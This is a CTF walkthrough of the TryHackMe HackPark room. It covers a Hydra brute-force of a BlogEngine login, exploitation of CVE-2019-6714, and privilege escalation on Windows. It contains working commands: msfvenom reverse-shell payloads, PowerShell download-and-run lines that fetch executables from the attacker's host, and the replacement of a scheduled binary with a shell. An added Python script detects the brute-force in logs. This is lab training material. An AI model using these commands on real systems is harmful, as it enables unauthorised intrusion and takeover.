Room Link: https://tryhackme.com/room/hackpark
Using Hydra to brute-force a login
What request type is the Windows website login form using?
Crafting request for Hydra
Sent a failed login request to Burp to see what it would look like. With this info I was able to craft my request for Hydra. I just needed to get the URL and everything that is sent after VIEWSTATE, and change the input to use ^USER^ and ^PASS^ to brute-force these fields.
I could also do this without Burp by just opening the console and getting the info from there.
hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/darkweb2017-top10000.txt 10.10.110.93 http-post-form "/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=vvTqZ%2FG4tEKhQoxeTpJ%2FyGxM9ZY9ZIvd6YMUS%2BoY3uaQCjC%2BJRdlkd8rbIQsDHztL%2BjsAvOLJhxU7vTNo3GP%2FLEmsndGPNAlCDn%2FB%2FrK2ynp9QkhRe9iqKBUmM5FQT2kX%2Bg%2BfPDNnTuzqW5IlmTujw4sLEzbvvec9FDW4cbQevgTj1tHnKx0vMmkVah5imro0o%2BHvQ5%2FGvpafEs1NdnW6wrSsUFuXnYzletKCdLG%2FgSb7bCDOK4ukZK%2F1cMOgYtjOCU4gk4M7PhQcYZmGpAN7pPVCMpX2YwGnTSgBPPmCB6avoLqG5jRS%2F3PYMjsqEGcD9P9S555GMQPxtfyvOEaJw%2B%2BZELKU2yVYr4uWxamEITsWNAT&__EVENTVALIDATION=Tp%2B5DS80H3PFB8ipJ24uKyHkPhSkqKD7GFJlc2U6IaO61l68aholdIjrZJ%2FsotSi0QxRBQjayWovmb2SU%2Fk6lY%2BOpju62jOGDkAvqcdNsqGrgf3vrAYw88XT2ONABFvDTR771I2YAr7JylJ0HbBZV83nGvvXWSC6rmKDGn80%2FuszTjDZ&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:F=Login failed" -V
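Added defender-side example, not part of the original write-up: the Hydra run above sends one POST to /Account/login.aspx per password, and because it detects failure by the body string "Login failed" rather than by status code, the practical detection signal on the server side is POST rate per client IP. The script below counts login POSTs per source address in a sliding window over constructed IIS-style log lines; the log field layout, the threshold and the addresses are assumptions.

```python
"""Flag brute-force bursts against the BlogEngine login form in IIS-style logs.
Added example for this write-up; log lines, field layout and threshold are constructed."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: date time cs-method cs-uri-stem c-ip (assumed field order)
SAMPLE_LOG = """\
2022-12-03 10:00:01 POST /Account/login.aspx 10.10.218.233
2022-12-03 10:00:01 POST /Account/login.aspx 10.10.218.233
2022-12-03 10:00:02 POST /Account/login.aspx 10.10.218.233
2022-12-03 10:00:02 POST /Account/login.aspx 10.10.218.233
2022-12-03 10:00:03 POST /Account/login.aspx 10.10.218.233
2022-12-03 10:00:03 POST /Account/login.aspx 10.10.218.233
2022-12-03 10:00:15 GET /Account/login.aspx 10.10.14.7
2022-12-03 10:00:20 POST /Account/login.aspx 10.10.14.7
"""

LOGIN_PATH = "/Account/login.aspx"  # the form Hydra targets in the write-up


def parse_line(line):
    """Split one constructed log line into (timestamp, method, uri, client_ip)."""
    date, time, method, uri, c_ip = line.split()
    return datetime.fromisoformat(f"{date} {time}"), method, uri, c_ip


def find_bruteforce(log_text, threshold=5, window=timedelta(seconds=60)):
    """Return {client_ip: peak_count} for IPs that issued at least `threshold`
    login POSTs inside any `window`. Status codes are deliberately ignored:
    a failed BlogEngine login is recognised by page content, not by status."""
    attempts = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, method, uri, c_ip = parse_line(line)
        if method == "POST" and uri == LOGIN_PATH:
            attempts[c_ip].append(ts)
    flagged = {}
    for ip, times in attempts.items():
        times.sort()
        start = 0  # left edge of the sliding window
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            count = end - start + 1
            if count >= threshold:
                flagged[ip] = max(count, flagged.get(ip, 0))
    return flagged


if __name__ == "__main__":
    print(find_bruteforce(SAMPLE_LOG))  # -> {'10.10.218.233': 6}
```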
Compromise the machine
Now you have logged into the website, are you able to identify the version of the BlogEngine?
What is the CVE?
CVE-2019-6714
Exploit Link: https://www.exploit-db.com/exploits/46353
Using the public exploit, gain initial access to the server. Who is the webserver running as?
Created the file mentioned in the exploit, just changed the IP to my IP.
Set up a nc listener
Upload the file
Navigate to the link and the nc listener should have caught it
Windows Privilege Escalation
Setting up meterpreter shell
Kali #1
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.218.233 LPORT=1337 -e x86/shikata_ga_nai -f exe -o reverse.exe
python2 -m SimpleHTTPServer 81
Kali #2
msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.10.218.233
set LPORT 1337
run
Victim
cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/reverse.exe','reverse.exe')"
reverse.exe
What is the OS version of this windows machine?
Further enumerate the machine. What is the name of the abnormal service running?
Check Windows Exploit Suggester
Kali
git clone https://github.com/AonCyberLabs/Windows-Exploit-Suggester.git
cd Windows-Exploit-Suggester/
python3.9 windows-exploit-suggester.py --update
python3.9 windows-exploit-suggester2.py --database 2022-12-03-mssb.xls --systeminfo systeminfo.txt
Transfer WinPeas
Kali
wget https://github.com/carlospolop/PEASS-ng/releases/download/20221127/winPEASx64.exe
python2 -m SimpleHTTPServer 81
Victim
cd C:\Windows\Temp
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/winPEASx64.exe','winPEASx64.exe')"
winPEASx64.exe
cd C:\Program Files (x86)\SystemScheduler\Events
type 20198415519.INI_LOG.txt
We can see that Message.exe keeps being run by Administrator, so we just need to replace the file with our reverse shell, set up a listener and wait for Administrator to run it again.
Kali
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.218.233 LPORT=1337 -f exe -o Message.exe
python2 -m SimpleHTTPServer 81
rlwrap nc -lvnp 1337
Victim
cd C:\Program Files (x86)\SystemScheduler
powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.10.218.233:81/Message.exe','Message.exe')"